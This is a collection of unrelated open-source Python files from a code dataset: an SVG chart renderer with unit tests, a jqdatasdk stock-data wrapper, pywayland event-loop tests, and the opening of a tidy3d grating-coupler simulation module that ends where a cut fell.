{}\n data['points'] = points\n data['atr'] = {}\n data['atr']['fill'] = 'none'\n data['atr']['stroke-width'] = 1\n data['atr']['stroke'] = '#ddd'\n data['atr']['shape-rendering'] = 'crispEdges'\n self.traces.append(data)\n\n def add_background(self):\n w = self.width - self.padding_left - self.padding_right\n h = self.height - self.padding_top - self.padding_bottom\n points = get_rectangular(w, h)\n padding = [self.padding_left, self.padding_bottom]\n points = shift_points(points, padding)\n data = {}\n data['points'] = points\n data['atr'] = {}\n data['atr']['fill'] = get_color('white')\n self.traces.append(data)\n\n def add_axes(self):\n d = 3\n w = self.width - self.padding_left - self.padding_right\n h = self.height - self.padding_top - self.padding_bottom\n padding = [self.padding_left, self.padding_bottom]\n\n data = {}\n data['atr'] = {}\n data['atr']['fill'] = 'none'\n data['atr']['stroke-width'] = 1\n data['atr']['stroke'] = '#999'\n data['atr']['shape-rendering'] = 'crispEdges'\n\n dx0 = 1 if self.inverseX else d\n dx1 = d if self.inverseX else 0\n\n # X top\n data = copy.deepcopy(data)\n points = [[-dx0, h], [w+dx1, h]]\n points = shift_points(points, padding)\n data['points'] = points\n self.traces.append(data)\n\n # X bottom\n data = copy.deepcopy(data)\n points = [[-dx0, 0], [w+dx1, 0]]\n points = shift_points(points, padding)\n data['points'] = points\n self.traces.append(data)\n\n # Y left\n data = copy.deepcopy(data)\n points = [[0, -d], [0, h]]\n points = shift_points(points, padding)\n data['points'] = points\n self.traces.append(data)\n\n # Y right\n data = copy.deepcopy(data)\n points = [[w, -d], [w, h]]\n points = shift_points(points, padding)\n data['points'] = points\n self.traces.append(data)\n\n def add_labels(self):\n w = self.width - self.padding_left - self.padding_right\n h = self.height - self.padding_top - self.padding_bottom\n padding = [self.padding_left, self.padding_bottom]\n\n data = {}\n data['atr'] = {}\n data['atr']['fill'] = 'none'\n data['atr']['stroke-width'] = 1\n data['atr']['stroke'] = '#ddd'\n data['atr']['shape-rendering'] = 'crispEdges'\n if self.is_axes_on_top:\n data['atr']['stroke-dasharray'] = '1, 5'\n\n text = {}\n text['atr'] = {}\n text['atr']['font-family'] = 'Verdana'\n text['atr']['font-size'] = 10\n text['atr']['fill'] = '#777'\n\n yn = len(self.ylabels)\n step = h / (yn-1)\n for i in xrange(0, yn):\n data = copy.deepcopy(data)\n y = i * step\n points = [[0, y], [w, y]]\n points = shift_points(points, padding)\n data['points'] = points\n self.traces.append(data)\n\n x = w+5 if self.inverseX else -5\n\n text = copy.deepcopy(text)\n text['text'] = self.ylabels[i]\n point = shift_point([x, y-3], padding)\n point = self.to_real_coords(point)\n text['atr']['x'] = point[0]\n text['atr']['y'] = point[1]\n text['atr']['text-anchor'] = 'start' if self.inverseX else 'end'\n self.texts.append(text)\n\n xn = len(self.xlabels)\n step = w / (xn-1)\n for i in xrange(0, xn):\n data = copy.deepcopy(data)\n x = i * step\n points = [[x, 0], [x, h]]\n points = shift_points(points, padding)\n data['points'] = points\n self.traces.append(data)\n\n text = copy.deepcopy(text)\n j = xn - i - 1 if self.inverseX else i\n text['text'] = self.xlabels[j]\n point = shift_point([x, -15], padding)\n point = self.to_real_coords(point)\n text['atr']['x'] = point[0]\n text['atr']['y'] = point[1]\n text['atr']['text-anchor'] = 'middle'\n self.texts.append(text)\n\n def add(self, ys, xs=None, stroke_width=1, stroke='black',\n fill='none', stroke_dash=False, drop=None):\n ny = len(ys)\n if xs is None:\n xs = range(0, ny)\n n = min(len(xs), ny)\n xs = xs[:n]\n ys = ys[:n]\n\n points = [[xs[i], ys[i]] for i in xrange(0, n)]\n\n drops = []\n if drop is not None and len(points) >= 1:\n first = points[0]\n last = points[-1]\n drops.append(first)\n drops.append([first[0], 0])\n drops.append([last[0], 0])\n drops.append(last)\n\n if fill != 'none':\n self.is_axes_on_top = True\n points = close_points(points)\n\n for p in points:\n self.canvas.include(p)\n\n data = {}\n data['canvas'] = points\n data['atr'] = {}\n data['atr']['fill'] = fill\n data['atr']['stroke-width'] = stroke_width\n data['atr']['stroke'] = get_color(stroke)\n if stroke_dash:\n if stroke_dash is True:\n stroke_dash = '10, 5'\n data['atr']['stroke-dasharray'] = stroke_dash\n self.traces.append(data)\n\n if len(drops) > 0:\n data = {}\n data['canvas'] = drops\n data['atr'] = {}\n data['atr']['fill'] = 'none'\n data['atr']['stroke-width'] = 1\n data['atr']['stroke'] = get_color(drop)\n self.traces.append(data)\n\n def canvas_to_points(self, canvas):\n w = self.width - self.padding_left - self.padding_right\n h = self.height - self.padding_top - self.padding_bottom\n\n xk = w\n yk = h\n if self.canvas.width():\n xk /= self.canvas.width()\n if self.canvas.height():\n yk /= self.canvas.height()\n\n if self.inverseX:\n canvas = shift_points(canvas, [-self.canvas.width(), 0])\n canvas = scale_points(canvas, [-1, 1])\n points = scale_points(canvas, [xk, yk])\n points = round_points(points)\n padding = [self.padding_left, self.padding_bottom]\n points = shift_points(points, padding)\n return points\n\n def to_real_coords(self, point):\n point = shift_point(point, [0, -self.height])\n point = scale_point(point, [1, -1])\n return point\n\n def render_points(self, points):\n points = [self.to_real_coords(p) for p in points]\n\n coords = ['{0},{1}'.format(p[0], p[1]) for p in points]\n\n pts = ' '.join(coords)\n return '\\tpoints=\"{0}\"'.format(pts)\n\n def render_cirle(self, point, color='red'):\n p = self.to_real_coords(point)\n return '<circle cx=\"{0}\" cy=\"{1}\" r=\"{2}\" fill=\"{3}\"/>'.format(\n p[0], p[1], 1, color)\n\n def render_trace(self, trace):\n res = []\n res.append('<polyline')\n\n canvas = trace.get('canvas')\n if canvas:\n trace['points'] = self.canvas_to_points(canvas)\n\n points = trace.get('points')\n if points:\n res.append(self.render_points(points))\n\n atr = trace.get('atr')\n if atr:\n for a in atr:\n res.append('\\t{0}=\\\"{1}\\\"'.format(a, atr[a]))\n\n res.append('/>')\n\n # for p in points:\n # res.append(self.render_cirle(p, color))\n\n return res\n\n def render_text(self, text):\n res = []\n res.append('<text')\n\n atr = text.get('atr')\n if atr:\n for a in atr:\n res.append('\\t{0}=\\\"{1}\\\"'.format(a, atr[a]))\n\n res.append('>')\n res.append(str(text['text']))\n res.append('</text>')\n return res\n\n def render(self):\n if self.is_axes_on_top:\n self.add_labels()\n self.add_axes()\n\n svg = []\n svg.append('<svg>')\n for t in self.traces:\n svg.extend(self.render_trace(t))\n\n for t in self.texts:\n svg.extend(self.render_text(t))\n svg.append('</svg>')\n return svg\n\n def render_to_svg(self, filepath):\n fileio.write_lines(self.render(), filepath)\n\n\n# def main():\n# xlabels = [0, 2, 4, 6, 8, 10, '12 hours']\n# ylabels = ['0 %', '50 %', '100 %']\n# chart = Chart(inverseX=True, xlabels=xlabels, ylabels=ylabels,\n# height=400)\n\n# #import random\n# #ys = [random.randrange(0, 100) for i in xrange(200)]\n# # c90c28 dark red\n# # 2e7eb3 blue\n# # fa730c orange\n# # 4aa635 green\n\n# color = '#2e7eb3'\n# ys = [10, 60, 60]\n# xs = [10, 20, 30]\n# chart.add(xs=xs, ys=ys, stroke=color, fill=color)\n\n# color = '#4aa635'\n# ys = [40, 70, 100, 98]\n# xs = [30, 40, 50, 60]\n# chart.add(xs=xs, ys=ys, stroke=color, fill=color)\n\n# chart.render_to_svg('test.svg')\n\n\nclass MyTest(unittest.TestCase):\n\n def test_round_point(self):\n self.assertEqual(round_point([2.1, 4.1]), [2, 4])\n self.assertEqual(round_point([2.9, 4.9]), [2, 4])\n\n def test_scale_point(self):\n self.assertEqual(scale_point([2, 4], [1, 0]), [2, 0])\n self.assertEqual(scale_point([2, 4], [0, 1]), [0, 4])\n self.assertEqual(scale_point([2, 4], [2, 2]), [4, 8])\n self.assertEqual(scale_point([2, 4], [-2, -2]), [-4, -8])\n\n def test_shift_point(self):\n self.assertEqual(shift_point([2, 4], [1, 0]), [3, 4])\n self.assertEqual(shift_point([2, 4], [1, 1]), [3, 5])\n self.assertEqual(shift_point([2, 4], [0, 1]), [2, 5])\n\n def test_round_points(self):\n self.assertEqual(round_points([[2.1, 4.1]]), [[2, 4]])\n self.assertEqual(round_points([[2.9, 4.9]]), [[2, 4]])\n\n def test_scale_points(self):\n self.assertEqual(scale_points([[2, 4]], [1, 0]), [[2, 0]])\n self.assertEqual(scale_points([[2, 4]], [0, 1]), [[0, 4]])\n self.assertEqual(scale_points([[2, 4]], [2, 2]), [[4, 8]])\n self.assertEqual(scale_points([[2, 4]], [-2, -2]), [[-4, -8]])\n\n def test_shift_points(self):\n self.assertEqual(shift_points([[2, 4]], [1, 0]), [[3, 4]])\n self.assertEqual(shift_points([[2, 4]], [1, 1]), [[3, 5]])\n self.assertEqual(shift_points([[2, 4]], [0, 1]), [[2, 5]])\n\n def test_get_rectangular(self):\n self.assertEqual(get_rectangular(1, 1), get_square())\n self.assertEqual(get_rectangular(2, 1),\n [[0, 0], [2, 0], [2, 1], [0, 1], [0, 0]])\n\n def test_get_color(self):\n self.assertEqual(get_color('white'), '#fff')\n self.assertEqual(get_color('black'), '#000')\n\n def test_render1(self):\n xlabels = []\n ylabels = []\n chart = Chart(xlabels=xlabels, ylabels=ylabels)\n self.assertEqual(chart.render(), fileio.read_lines(\n 'batterym/test/chart/render1.svg'))\n\n def test_render2(self):\n xlabels = [0, 2, 4, 6, 8, 10, '12 hours']\n ylabels = ['0 %', '50 %', '100 %']\n chart = Chart(xlabels=xlabels, ylabels=ylabels)\n self.assertEqual(chart.render(), fileio.read_lines(\n 'batterym/test/chart/render2.svg'))\n\n def test_render3(self):\n xlabels = [0, 2, 4, 6, 8, 10, '12 hours']\n ylabels = ['0 %', '50 %', '100 %']\n chart = Chart(xlabels=xlabels, ylabels=ylabels)\n color = 'red'\n ys = [10, 60, 60]\n xs = [10, 20, 30]\n chart.add(xs=xs, ys=ys, stroke=color, fill=color)\n self.assertEqual(chart.render(), fileio.read_lines(\n 'batterym/test/chart/render3.svg'))\n\n def test_render4(self):\n xlabels = [0, 2, 4, 6, 8, 10, '12 hours']\n ylabels = ['0 %', '50 %', '100 %']\n chart = Chart(xlabels=xlabels, ylabels=ylabels)\n color = 'red'\n ys = [10, 60, 60]\n chart.add(ys=ys, stroke=color, fill=color)\n self.assertEqual(chart.render(), fileio.read_lines(\n 'batterym/test/chart/render4.svg'))\n\n def test_render5(self):\n xlabels = [0, 2, 4, 6, 8, 10, '12 hours']\n ylabels = ['0 %', '50 %', '100 %']\n chart = Chart(xlabels=xlabels, ylabels=ylabels)\n color = 'red'\n ys = [10, 60, 60]\n chart.add(ys=ys, stroke=color, stroke_dash=True)\n self.assertEqual(chart.render(), fileio.read_lines(\n 'batterym/test/chart/render5.svg'))\n\n def test_render6(self):\n xlabels = [0, 2, 4, 6, 8, 10, '12 hours']\n ylabels = ['0 %', '50 %', '100 %']\n chart = Chart(xlabels=xlabels, ylabels=ylabels, inverseX=True)\n color = 'red'\n ys = [10, 60, 60]\n chart.add(ys=ys, stroke=color, fill=color)\n self.assertEqual(chart.render(), fileio.read_lines(\n 'batterym/test/chart/render6.svg'))\n\n# if __name__ == '__main__':\n# # main()\n# unittest.main()\n","repo_name":"maks-a/batterym","sub_path":"batterym/chart.py","file_name":"chart.py","file_ext":"py","file_size_in_byte":15827,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"48"} +{"seq_id":"5281197462","text":"\nimport pandas as pd\nimport datetime\nimport jqdatasdk as jq\nfrom functools import partial\nimport pandas as pd\nimport datetime\nimport os\n\n\nINDEX_CODES = ['000016.XSHG', '000300.XSHG', '000905.XSHG', '000852.XSHG', '000688.XSHG', '399001.XSHE',\n '399006.XSHE', '000001.XSHG']\n\nINDEX_NAMES = {\n '000016.XSHG': 'sz50',\n '000300.XSHG': 'hs300',\n '000905.XSHG': 'zz500',\n '000852.XSHG': 'zz1000',\n '000688.XSHG': 'kc50',\n '399001.XSHE': 'szcz',\n '399006.XSHE': 'cybz',\n '000001.XSHG': 'szzs'\n}\njq.auth(os.environ['JQ_USER'],os.environ['JQ_PASSWD'])\n\n\nget_all_securities = jq.get_all_securities\nget_trade_days = jq.get_trade_days\n\n\ndef get_security_info(**kwargs):\n instruments = get_all_securities()\n instruments.index.name = 'code'\n instruments = instruments.reset_index()\n return instruments\n\ndef get_industry_cons(start_date=None, end_date=None, trade_date=None, name='sw_l1'):\n ############行业成分##########\n if trade_date is not None:\n start_date = trade_date\n end_date = trade_date\n\n all_trade_dates = jq.get_trade_days(\n start_date=start_date, end_date=end_date)\n if all_trade_dates.__len__() == 0:\n return pd.DataFrame()\n\n def __get_daily_cons(ind, date, ind_names):\n ind_name = ind_names[ind]\n ind_cons = jq.get_industry_stocks(ind, date=date)\n ind_names = [ind_name] * len(ind_cons)\n dates_index = [date] * len(ind_cons)\n df = pd.DataFrame(\n {'date': dates_index, 'code': ind_cons, 'industry_name': ind_names})\n return df\n\n res = pd.DataFrame()\n for date in all_trade_dates:\n universe = jq.get_all_securities(date=date).index\n all_sw_industry = jq.get_industries(name=name, date=date)\n all_sw_industry2 = all_sw_industry.reset_index()\n\n ind_names = all_sw_industry['name']\n\n func = partial(__get_daily_cons, date=date, ind_names=ind_names)\n ind_cons = all_sw_industry2.iloc[:, 0].apply(func)\n ind_cons = pd.concat(ind_cons.values).reset_index(drop=True)\n\n res = pd.concat([res, ind_cons])\n return res\n\n\ndef get_caps(start_date=None, end_date=None, trade_date=None):\n ###########流通市值#########\n\n if trade_date is not None:\n start_date = trade_date\n end_date = trade_date\n daterange = jq.get_trade_days(start_date=start_date, end_date=end_date)\n\n q = jq.query(jq.valuation.capitalization,\n jq.valuation.circulating_cap,\n jq.valuation.code,\n jq.valuation.day)\n\n def get_data(q, x):\n df = jq.get_fundamentals(q, date=x)\n return df\n dflist = list(map(lambda x: get_data(q, x), daterange))\n # dflist = list(filter(lambda x: not x.empty, dflist))\n # if dflist:\n data = pd.concat(dflist).rename(columns={'day': 'date'})\n # else:\n # raise Exception('get_caps failed')\n # data['date'] = pd.to_datetime(data['date'])\n data['date'] = data['date'].apply(lambda x: pd.to_datetime(x).date())\n return data\n\n\ndef get_eps(start_date=None, end_date=None, trade_date=None):\n ##########eps########\n\n if trade_date is not None:\n start_date = trade_date\n end_date = trade_date\n stocks = jq.get_all_securities(\n types=['stock'], date=trade_date).index.to_list()\n df = jq.get_factor_values(stocks, 'eps_ttm', start_date, end_date)[\n 'eps_ttm'].T\n value_vars = df.columns\n df['code'] = df.index\n df_res = pd.melt(df, id_vars=[\n 'code'], value_vars=value_vars, var_name='date', value_name='eps_ttm')\n df_res['date'] = df_res['date'].apply(lambda x: x.date())\n return df_res[['code', 'date', 'eps_ttm']]\n\n\ndef get_index_weights(index_list=INDEX_CODES, start_date=None, end_date=None, trade_date=None):\n ###########指数成分##############\n \"\"\"单位为%\"\"\"\n if trade_date is not None:\n start_date = jq.get_trade_days(start_date=trade_date)[1]\n end_date = jq.get_trade_days(start_date=trade_date)[1]\n index_name_list = [INDEX_NAMES[ind] for ind in INDEX_CODES]\n all_trade_dates = jq.get_trade_days(\n start_date=start_date, end_date=end_date)\n start_month_firstday = datetime.datetime(\n all_trade_dates[0].year, all_trade_dates[0].month, 1)\n end_month_firstday = datetime.datetime(\n all_trade_dates[0].year, all_trade_dates[-1].month, 1)\n month_starts = pd.date_range(\n start_month_firstday, end_month_firstday, freq='MS')\n month_starts = [i.date() for i in month_starts]\n new_all_trade_dates = sorted(\n list(set(all_trade_dates.tolist() + month_starts)))\n datas = []\n # print(f'all_trade_dates:{all_trade_dates} \\n start_month_firstday:{start_month_firstday} \\n end_month_firstday:{end_month_firstday}\\n ')\n # print(f'month_starts:{month_starts}\\n new_all_trade_dates:{new_all_trade_dates}')\n def __get_index_weights(index_code, all_trade_dates, month_starts):\n datas = []\n for date in month_starts:\n universe = jq.get_all_securities(date=date).index\n daily_cons = jq.get_index_weights(\n index_code, date=date)[['weight']]\n daily_cons = daily_cons.reindex(universe).fillna(0)\n daily_cons.index.name = 'code'\n daily_cons['date'] = date\n datas.append(daily_cons)\n datas = pd.concat(datas).reset_index()\n datas = datas.set_index(['date', 'code'])\n return datas\n for index in index_list:\n datas.append(__get_index_weights(\n index, all_trade_dates=all_trade_dates, month_starts=month_starts))\n datas = pd.concat(datas, axis=1)\n datas = datas.groupby(level=1).apply(lambda x: x.droplevel(1).reindex(\n new_all_trade_dates).ffill().reindex(all_trade_dates)).swaplevel(0, 1)\n datas.columns = index_name_list\n datas = datas.reset_index()\n # print(datas)\n if trade_date is not None:\n datas['date'] = trade_date\n return datas\n\n\ndef get_summary_data(start_date=None, end_date=None, trade_date=None, index_col=['date', 'code'], func_list=[get_industry_cons, get_caps, get_eps, get_index_weights]):\n #########获取汇总数据#############\n\n if trade_date is not None:\n start_date = trade_date\n end_date = trade_date\n datas = []\n for func in func_list:\n data = func(start_date=start_date, end_date=end_date,\n trade_date=trade_date)\n # if not data.empty:\n # print(str(func))\n # print(data)\n # print(data['date'].dtype)\n data = data.set_index(index_col)\n datas.append(data)\n datas = pd.concat(datas, axis=1)\n return datas.reset_index()\n\nclass jq_bar_api():\n def __init__(self):\n self.all_factors = ['open', 'close', 'high', 'low', 'volume', 'money', 'avg', 'high_limit', 'low_limit', 'pre_close', 'paused', 'factor']\n def query(\n self, \n universe=None,\n factor_list=None,\n start_date=None,\n end_date=None,\n trade_date=None,\n ):\n if trade_date is not None:\n trade_date = datetime.datetime.strptime(trade_date,'%Y-%m-%d')\n start_date = trade_date\n end_date = trade_date + datetime.timedelta(1)\n end_date = end_date.strftime('%Y-%m-%d')\n else:\n if start_date is None:\n start_date = '2010-01-01'\n\n if end_date is None:\n end_date = datetime.datetime.now().strftime('%Y-%m-%d')\n df = jq.get_price(universe, start_date=start_date, end_date=end_date, frequency='daily', fields=factor_list, skip_paused=False, fq='post').rename(columns = {'time':'date'})\n return df\n\n\n\nclass ext_bardata_api2_jq():\n def __init__(self):\n self.all_factors = ['pe_ratio', 'turnover_ratio', 'pb_ratio', 'ps_ratio', 'pcf_ratio', 'capitalization', 'market_cap', 'circulating_cap', 'circulating_market_cap', 'pe_ratio_lyr']\n def query(\n self, \n universe=None,\n factor_list=None,\n start_date=None,\n end_date=None,\n trade_date=None,\n ):\n if trade_date is not None:\n trade_date = datetime.datetime.strptime(trade_date,'%Y-%m-%d')\n start_date = trade_date\n end_date = trade_date + datetime.timedelta(1)\n end_date = end_date.strftime('%Y-%m-%d')\n else:\n if start_date is None:\n start_date = '2010-01-01'\n\n if end_date is None:\n end_date = datetime.datetime.now().strftime('%Y-%m-%d')\n \n # universe_set =tuple(universe)\n # sql = f\"SELECT stock_valuation.id, stock_valuation.code, stock_valuation.pe_ratio, stock_valuation.turnover_ratio, stock_valuation.pb_ratio, stock_valuation.ps_ratio, stock_valuation.pcf_ratio, stock_valuation.capitalization, stock_valuation.market_cap, stock_valuation.circulating_cap, stock_valuation.circulating_market_cap, stock_valuation.day, stock_valuation.pe_ratio_lyr \\nFROM stock_valuation \\nWHERE stock_valuation.code in {universe_set} AND ((stock_valuation.day>='{start_date}') AND (stock_valuation.day<='{end_date}')) \\n LIMIT 10000\"\n # sql2 = \"SELECT stock_valuation.id, stock_valuation.code, stock_valuation.pe_ratio, stock_valuation.turnover_ratio, stock_valuation.pb_ratio, stock_valuation.ps_ratio, stock_valuation.pcf_ratio, stock_valuation.capitalization, stock_valuation.market_cap, stock_valuation.circulating_cap, stock_valuation.circulating_market_cap, stock_valuation.day, stock_valuation.pe_ratio_lyr \\nFROM stock_valuation \\nWHERE stock_valuation.code IN ('000001.XSHE') AND stock_valuation.day = '2022-08-01' \\n LIMIT 10000\"\n # ins = JQDataClient.instance()\n # ins.get_fundamentals(sql=sql)\n \n days = jq.get_trade_days(start_date=start_date,end_date=end_date, count=None)\n all_df = []\n for day in days:\n \n df = jq.get_fundamentals(jq.query(\n jq.valuation\n ).filter(\n jq.valuation.code.in_(universe)\n ), date=day)\n\n if df.empty:\n print(f'{day} empty')\n continue\n del df['id']\n df.rename(columns={'day': 'date'}, inplace=True)\n\n columns = list(df.columns)\n columns.insert(0, columns.pop(columns.index('code')))\n columns.insert(0, columns.pop(columns.index('date')))\n df0 = df[columns]\n all_df.append(df0)\n all_df = pd.concat(all_df) \n all_df = all_df.set_index(['date','code'])[self.all_factors]\n return all_df\n\n\nclass ext_bardata_api_jq():\n def __init__(self):\n self.all_factors = ['industry_name', 'capitalization', 'circulating_cap', 'eps_ttm', 'sz50', 'hs300', 'zz500', 'zz1000', 'kc50', 'szcz', 'cybz', 'szzs']\n def query(\n self, \n universe=None,\n factor_list=None,\n start_date=None,\n end_date=None,\n trade_date=None,\n ):\n if trade_date is not None:\n trade_date = datetime.datetime.strptime(trade_date,'%Y-%m-%d')\n start_date = trade_date\n end_date = trade_date + datetime.timedelta(1)\n end_date = end_date.strftime('%Y-%m-%d')\n else:\n if start_date is None:\n start_date = '2010-01-01'\n\n if end_date is None:\n end_date = datetime.datetime.now().strftime('%Y-%m-%d')\n all_data = get_summary_data(start_date=start_date,end_date=end_date,trade_date=trade_date)\n all_data = all_data.set_index(['date','code'])[self.all_factors]\n return all_data\n\njq_bar_api = jq_bar_api()\next_bardata_api_jq = ext_bardata_api_jq()\next_bardata_api2_jq = ext_bardata_api2_jq()\n\n\nif __name__ == '__main__':\n all_sec = jq.get_all_securities().index.tolist()\n bar = jq_bar_api.query(universe=all_sec,start_date='2022-07-25',end_date='2022-07-25')\n ext_bardata = ext_bardata_api_jq.query(universe=all_sec,start_date='2022-07-25',end_date='2022-07-25')\n ext_bardata2 = ext_bardata_api2_jq.query(universe=all_sec,start_date='2022-07-25',end_date='2022-07-25')\n print('paused......')","repo_name":"robortcher/singletrader","sub_path":"singletrader/datautils/dataapi/jqapi.py","file_name":"jqapi.py","file_ext":"py","file_size_in_byte":12153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35517128265","text":"import os\nimport signal\nimport time\n\nfrom pywayland.server.eventloop import EventLoop\nfrom pywayland.server.listener import Listener\n\n\nclass _GetCallback:\n def __init__(self):\n self.callback = None\n self.n_calls = 0\n\n\ndef _fd_callback(fd, mask, data):\n data.callback = fd\n data.n_calls += 1\n return 0\n\n\ndef _signal_callback(signal_number, data):\n data.callback = signal_number\n data.n_calls += 1\n return 1\n\n\ndef _timer_callback(data):\n data.n_calls += 1\n return 1\n\n\ndef test_event_loop_post_dispatch_check():\n callback = _GetCallback()\n event_loop = EventLoop()\n\n r, w = os.pipe()\n\n try:\n source = event_loop.add_fd(\n r, _fd_callback, EventLoop.FdMask.WL_EVENT_READABLE, callback\n )\n source.check()\n\n event_loop.dispatch(0)\n assert callback.callback == r\n finally:\n os.close(r)\n os.close(w)\n\n\ndef test_event_loop_signal():\n callback = _GetCallback()\n event_loop = EventLoop()\n\n event_loop.add_signal(signal.SIGUSR1, _signal_callback, callback)\n\n event_loop.dispatch(0)\n assert callback.callback is None\n\n os.kill(os.getpid(), signal.SIGUSR1)\n\n event_loop.dispatch(0)\n assert callback.callback == signal.SIGUSR1\n\n\ndef test_event_loop_multiple_same_signals():\n callback = _GetCallback()\n event_loop = EventLoop()\n\n signal_rm = event_loop.add_signal(signal.SIGUSR1, _signal_callback, callback)\n event_loop.add_signal(signal.SIGUSR1, _signal_callback, callback)\n\n event_loop.dispatch(0)\n assert callback.n_calls == 0\n\n # Check callback gets 2 calls\n for _ in range(5):\n callback.n_calls = 0\n os.kill(os.getpid(), signal.SIGUSR1)\n event_loop.dispatch(0)\n\n assert callback.n_calls == 2\n\n # Remove one of the signals\n signal_rm.remove()\n\n # Callback only gets call now\n for _ in range(5):\n callback.n_calls = 0\n os.kill(os.getpid(), signal.SIGUSR1)\n event_loop.dispatch(0)\n\n assert callback.n_calls == 1\n\n\ndef test_event_loop_timer():\n callback = _GetCallback()\n event_loop = EventLoop()\n\n source = event_loop.add_timer(_timer_callback, callback)\n source.timer_update(10)\n\n event_loop.dispatch(0)\n assert callback.n_calls == 0\n\n event_loop.dispatch(20)\n assert callback.n_calls == 1\n\n\ndef _timer_update_callback1(data):\n data.n_calls += 1\n data.source2.timer_update(1000)\n return 1\n\n\ndef _timer_update_callback2(data):\n data.n_calls += 1\n data.source1.timer_update(1000)\n return 1\n\n\ndef test_event_loop_timer_updates():\n callback = _GetCallback()\n event_loop = EventLoop()\n\n source1 = event_loop.add_timer(_timer_update_callback1, callback)\n source1.timer_update(10)\n\n source2 = event_loop.add_timer(_timer_update_callback2, callback)\n source2.timer_update(10)\n\n callback.source1 = source1\n callback.source2 = source2\n\n assert callback.n_calls == 0\n\n # Wait 15 ms, so both timers should be called when we dispatch\n time.sleep(0.015)\n\n # This should take < 1 sec\n start_time = time.time()\n event_loop.dispatch(20)\n end_time = time.time()\n\n assert callback.n_calls == 2\n\n assert end_time - start_time < 1\n\n\ndef _destroy_notify_a(listener, data):\n global a\n a = True\n\n\ndef _destroy_notify_b(listener, data):\n global b\n b = True\n\n\ndef test_event_loop_destroy():\n global a, b\n a = False\n b = False\n\n event_loop = EventLoop()\n listener_a = Listener(_destroy_notify_a)\n listener_b = Listener(_destroy_notify_b)\n\n event_loop.add_destroy_listener(listener_a)\n event_loop.add_destroy_listener(listener_b)\n\n listener_a.remove()\n\n event_loop.destroy()\n\n import gc\n\n gc.collect()\n\n assert a is False\n assert b is True\n","repo_name":"flacjacket/pywayland","sub_path":"test/test_server_eventloop.py","file_name":"test_server_eventloop.py","file_ext":"py","file_size_in_byte":3777,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"48"} +{"seq_id":"40597128777","text":"from __future__ import annotations\n\nimport pathlib\nimport time\nfrom collections.abc import Awaitable\n\nimport gdsfactory as gf\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tidy3d as td\nimport yaml\nfrom gdsfactory.config import logger\nfrom gdsfactory.serialization import clean_value_json\nfrom gdsfactory.typings import (\n Any,\n Component,\n ComponentSpec,\n Dict,\n List,\n PathType,\n Sparameters,\n)\n\nfrom gplugins.common.utils.get_sparameters_path import (\n get_sparameters_path_tidy3d as get_sparameters_path,\n)\nfrom gplugins.tidy3d.get_results import _executor, get_results\nfrom gplugins.tidy3d.get_simulation_grating_coupler import (\n get_simulation_grating_coupler,\n)\n\n\ndef plot_simulation(\n sim: td.Simulation,\n z: float = 0.0,\n y: float = 0.0,\n wavelength: float | None = 1.55,\n figsize: tuple[float, float] = (11, 4),\n):\n \"\"\"Returns Simulation visual representation. Returns two views for 3D component and one view for 2D.\n\n Args:\n sim: simulation object.\n z: (um).\n y: (um).\n wavelength: (um) for epsilon plot. None plot structures only.\n figsize: figure size.\n\n \"\"\"\n fig = plt.figure(figsize=figsize)\n if sim.size[2] > 0.1 and sim.size[1] > 0.1:\n gs = mpl.gridspec.GridSpec(1, 2, figure=fig, width_ratios=[1, 1.4])\n ax1 = fig.add_subplot(gs[0, 0])\n ax2 = fig.add_subplot(gs[0, 1])\n if wavelength:\n freq = td.constants.C_0 / wavelength\n sim.plot_eps(z=z, ax=ax1, freq=freq)\n sim.plot_eps(y=y, ax=ax2, freq=freq)\n else:\n sim.plot(z=z, ax=ax1)\n sim.plot(y=y, ax=ax2)\n elif sim.size[2] > 0.1: # 2D grating sim_size_y = 0\n gs = mpl.gridspec.GridSpec(1, 1, figure=fig, width_ratios=[1])\n ax1 = fig.add_subplot(gs[0, 0])\n if wavelength:\n freq = td.constants.C_0 / wavelength\n sim.plot_eps(y=y, ax=ax1, freq=freq)\n else:\n sim.plot(y=y, ax=ax1)\n\n else: # 2D planar component size_z = 0\n gs = mpl.gridspec.GridSpec(1, 1, figure=fig, width_ratios=[1])\n ax1 = fig.add_subplot(gs[0, 0])\n if wavelength:\n freq = td.constants.C_0 / wavelength\n sim.plot_eps(z=z, ax=ax1, freq=freq)\n else:\n sim.plot(z=z, ax=ax1)\n\n plt.show()\n return fig\n\n\ndef write_sparameters_grating_coupler(\n component: ComponentSpec,\n dirpath: PathType | None = None,\n filepath: PathType | None = None,\n overwrite: bool = False,\n port_waveguide_name: str = \"o1\",\n fiber_port_prefix: str = \"opt\",\n verbose: bool = False,\n run: bool = True,\n **kwargs,\n) -> Sparameters:\n \"\"\"Get sparameter matrix from a gdsfactory grating coupler.\n\n Assumes grating coupler waveguide port is facing to the left (west).\n\n TODO: add a fiber model (more realistic than a gaussian_beam).\n\n Args:\n component: grating coupler gdsfactory Component to simulate.\n dirpath: directory to store sparameters in npz.\n Defaults to active Pdk.sparameters_path.\n filepath: optional sparameters file.\n overwrite: overwrites stored Sparameter npz results.\n verbose: prints info messages and progressbars.\n run: runs simulation, if False, only plots simulation.\n\n Keyword Args:\n port_extension: extend ports beyond the PML.\n layer_stack: contains layer to thickness, zmin and material.\n Defaults to active pdk.layer_stack.\n thickness_pml: PML thickness (um).\n xmargin: left/right distance from component to PML.\n xmargin_left: left distance from component to PML.\n xmargin_right: right distance from component to PML.\n ymargin: left/right distance from component to PML.\n ymargin_top: top distance from component to PML.\n ymargin_bot: bottom distance from component to PML.\n zmargin: thickness for cladding above and below core.\n clad_material: material for cladding.\n box_material: for bottom cladding.\n substrate_material: for substrate.\n box_thickness: bottom cladding thickness in (um).\n substrate_thickness: (um).\n port_waveguide_name: input port name.\n port_margin: margin on each side of the port.\n distance_source_to_monitors: in (um) source goes before monitors.\n port_waveguide_offset: mode solver workaround.\n positive moves source forward, negative moves source backward.\n wavelength: source center wavelength (um).\n if None takes mean between wavelength_start, wavelength_stop.\n wavelength_start: in (um).\n wavelength_stop: in (um).\n wavelength_points: number of wavelengths.\n plot_modes: plot source modes.\n num_modes: number of modes to plot.\n run_time_ps: make sure it's sufficient for the fields to decay.\n defaults to 10ps and counts on the automatic shutoff\n to stop earlier if needed.\n fiber_port_prefix: port prefix to place 